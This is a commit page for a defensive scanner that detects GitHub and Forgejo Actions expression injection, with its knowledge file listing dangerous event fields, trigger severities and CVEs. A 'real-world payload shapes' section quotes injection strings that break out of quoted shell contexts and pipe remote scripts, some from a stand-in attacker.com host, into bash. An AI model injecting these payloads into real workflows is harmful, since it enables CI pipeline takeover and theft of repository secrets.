Kjell Tore Guttormsen c31d4b1718 feat(workflow-scanner): E11 part 1 — core file-walk + 23-field blacklist + sink-restriction

Adds a deterministic GitHub Actions / Forgejo Actions injection
scanner. Detects \${{ <dangerous-field> }} interpolations inside
\`run:\` step blocks under privileged or semi-privileged triggers.
Sink-restricted: \`if:\` / \`with:\` / \`env:\` (block-level) are
evaluated by the runner expression engine, not the shell, so they
are NOT injection sinks and are suppressed at parser level.

Why: workflow expression injection is the most prevalent SAST class
on GitHub (CodeQL preview: 800K+ findings across 158K repos). The
graduated severity matrix (HIGH for pull_request_target / discussion
/ workflow_run; MEDIUM for pull_request / workflow_dispatch) is the
community-converged calibration target — uniform HIGH causes alert
fatigue.

Components:
- scanners/lib/workflow-yaml-state.mjs — line-based YAML state
  machine. Tracks indentation, parent-context stack, and
  \`run: |\` / \`run: >\` block-scalar entry/exit. Zero deps.
- scanners/workflow-scanner.mjs — discoverWorkflows() probes
  .github/workflows/ and .forgejo/workflows/ directly (file-discovery
  has no glob include). 23-field blacklist (GHSL 17 + 6 GlueStack-
  class additions). Platform encoded via file path; no schema
  extension to finding(). Forgejo-specific: workflow_run advisory
  emitted to stderr; recommendation text mentions Forgejo's
  server-level token scoping (job-level permissions: is ignored).
- knowledge/workflow-injection-patterns.md — 23-field blacklist,
  trigger taxonomy, severity matrix, Forgejo divergences, NVD CVE
  corpus.

Tests (47 new):
- tests/lib/workflow-yaml-state.test.mjs (15): trigger forms
  (string / inline-list / block-list / block-mapping), single-line
  run, block-scalar | and > tracking, env/with sink-mismatch,
  multi-line, comment stripping, line-number accuracy.
- tests/scanners/workflow-scanner.test.mjs (14): TP head_ref
  pull_request_target, TP discussion.title gluestack pattern,
  TP comment.body pull_request, TP issue.body block-scalar,
  FP if-context, FP env-block, INFO numeric, Forgejo TP, Forgejo
  workflow_run advisory, envelope shape, WFL prefix.
- 9 fixtures in tests/fixtures/workflows/{.github,.forgejo}/workflows/.

Out of scope (B4 / Batch D):
- Re-interpolation detection (env.VAR after env: from blacklisted source)
- github.actor authorization-bypass category
- WFL prefix in severity.mjs OWASP maps + scan-orchestrator
  registration (B4)
- Composite-action input tracing, GITHUB_ENV poisoning (Batch D)

Test count: 1685 → 1732 (+47). Pre-compact-scan flake unchanged
(passes in isolation).

2026-04-30 15:48:48 +02:00

7.1 KiB

Raw Blame History

Workflow Injection Patterns (E11)

Knowledge file for scanners/workflow-scanner.mjs. Covers GitHub Actions and Forgejo Actions ${{ <expr> }} injection sinks inside run: step blocks. Sourced from .claude/projects/2026-04-29-batch-c-scope-finalize/research/01-github-forgejo-actions-injection.md (confidence 0.92, 51 sources).

Canonical 23-field blacklist

The community has converged on a blacklist (zizmor #1878) rather than a whitelist of safe fields. The 23 fields below are the v7.3.0 baseline — GitHub Security Lab's canonical 17-field list plus 6 GlueStack-class additions. All patterns match both github.* and forgejo.* prefixes (Forgejo aliases github.* to forgejo.* per its Reference docs).

GHSL canonical 17

github.event.issue.title
github.event.issue.body
github.event.pull_request.title
github.event.pull_request.body
github.event.pull_request.head.ref
github.event.pull_request.head.label
github.event.pull_request.head.repo.default_branch
github.event.comment.body
github.event.review.body
github.event.commits.*.message
github.event.commits.*.author.email
github.event.commits.*.author.name
github.event.head_commit.message
github.event.head_commit.author.email
github.event.head_commit.author.name
github.event.pages.*.page_name
github.head_ref

GlueStack-class additions (v7.3.0)

github.event.discussion.title           # CVE-2025-53104
github.event.discussion.body            # CVE-2025-53104
github.event.discussion.user.login      # CVE-2025-53104
github.event.inputs.*                   # workflow_dispatch — string inputs only
github.event.client_payload.*           # repository_dispatch
inputs.*                                # bare `inputs.<name>` (action-side / reusable workflow)

Severity matrix

Tier	Field class	Trigger context	Severity
Privileged trigger	dangerous	`pull_request_target`, `issue_comment`, `discussion`, `discussion_comment`, `workflow_run`	HIGH
Semi-privileged trigger	dangerous	`pull_request`, `workflow_dispatch`, `repository_dispatch`	MEDIUM
Other / no trigger info	dangerous	(default fallback)	MEDIUM
Numeric / hex / fixed-string	safe	any	INFO (suppressed in summary)
Sink mismatch	(any)	`if:`, `with:`, `env:` (block-level), `name:`, `runs-on:`, `timeout-minutes:`	NOT injection — suppressed at parser level

Safe fields (INFO-only, never injection sinks)

github.event.pull_request.number      # integer
github.event.pull_request.head.sha    # 40-char hex
github.run_id                         # server-assigned int
github.run_number                     # int
github.sha                            # 40-char hex
github.event.action                   # fixed string ("opened" / "closed" / …)
github.event.repository.full_name     # admin-controlled

Trigger taxonomy

Privileged (HIGH-severity matrix)

pull_request_target — runs on the BASE repo, has write tokens. The canonical "pwn-request" trigger.
issue_comment — fires on any new issue/PR comment. Attacker-supplied comment.body is shell-injectable.
discussion and discussion_comment — same shape as issue_comment, but the Discussion fields evade older zizmor whitelists. CVE-2025-53104 (gluestack) used ${{ github.event.discussion.title }}.
workflow_run — chained workflow trigger. Inherits BASE repo privileges. NOT documented for Forgejo Actions; Forgejo scans treat it as privileged for severity but emit a stderr advisory.

Semi-privileged (MEDIUM-severity matrix)

pull_request — read-only token from forks; still injectable, just less catastrophic.
workflow_dispatch — manual trigger with string inputs.*; CVE-2026-35580 (NSA Emissary) used this.
repository_dispatch — webhook-driven trigger with client_payload.*.

Sink restriction

Only run: step content (single-line or block-scalar | / >) is a shell injection sink. The runner expression engine evaluates expressions inside:

if: — boolean evaluation, no shell. (actionlint #443.)
with: — passed to action input; downstream action's responsibility.
env: (any level) — bound to env var; safe IF consumed via $VAR in the run script. Re-interpolation ${{ env.VAR }} inside run: cancels the mitigation (Appsmith CVE GHSL-2024-277).

The scanner suppresses findings whose parent is one of these contexts. The re-interpolation pattern is detected separately in B4.

Forgejo divergences

Item	GitHub	Forgejo	Scanner implication
Primary context	`github.*`	`forgejo.` (alias `github.`)	Match both prefixes
Job-level `permissions:`	Enforced	Ignored	Recommendation text mentions Forgejo's server-level token scoping instead
`workflow_run` trigger	Supported	Likely unsupported	Stderr advisory emitted; severity logic still applies
OIDC	`permissions: id-token: write`	`enable-openid-connect`	Out of scope for E11

The scanner detects platform from file path (.forgejo/workflows/ → forgejo, .github/workflows/ → github). Both directories are scanned independently when both exist; there is no fallback from one to the other (documented design choice — the v7.3.0 plan locked this in to avoid over-confident mitigation guidance for Forgejo).

Real-world payload shapes (v7.3.0 reference)

${IFS} brace-expansion (Ultralytics CVE-2024): openimbot:$({curl,-sSfL,raw...}${IFS}|${IFS}bash)
Quote-break + curl (ultralytics GHSA-7x29-qqmq-v6qc): Hacked";{curl,-sSfL,gist...}${IFS}|${IFS}bash
Discussion title $() substitution (gluestack CVE-2025-53104): $(curl -sSfL attacker.com/exfil.sh | bash)
workflow_dispatch shell-break (Emissary CVE-2026-35580): 1.0.0"; curl attacker.com/backdoor.sh | bash; echo "

Single-quote shell escaping provides ZERO protection — template substitution happens BEFORE shell parsing (Ken Muse, Appsmith CVE).

Confirmed CVE corpus (NVD / vendor-confirmed)

CVE-2023-49291 — tj-actions/branch-names ≤7.0.6 (HIGH 9.3)
CVE-2025-30066 — tj-actions/changed-files (HIGH 8.6, CISA KEV)
CVE-2025-30154 — reviewdog/action-setup v1 (HIGH 8.6, CISA KEV)
CVE-2025-53104 — gluestack-ui (CRITICAL 9.1, Discussion vector)
CVE-2025-61671 — Microsoft Symphony (CRITICAL 9.3)
CVE-2026-33475 — langflow-ai/langflow (CRITICAL 9.1)
CVE-2026-35580 — NSA Emissary (CRITICAL 9.x, April 2026)
CVE-2026-3854 — GitHub.com / GHES ≤3.19.2 platform-level (HIGH 8.7)

The April 2026 elementary-data PyPI compromise (Gemini second opinion) is on a watch-list pending NVD/StepSecurity confirmation.

Out of scope (deferred to Batch D / v8.0.0)

Composite-action input tracing
Reusable-workflow call analysis
GITHUB_ENV poisoning detection (LegitSecurity, CodeQL actions-envvar-injection-critical)
Zombie-workflow scanning across non-default branches
IssueOps TOCTOU (SHA at comment time vs review time)
Authorization-bypass class for github.actor checks (Synacktiv 2023 Dependabot spoofing) — added in B4 as a separate finding category.

7.1 KiB Raw Blame History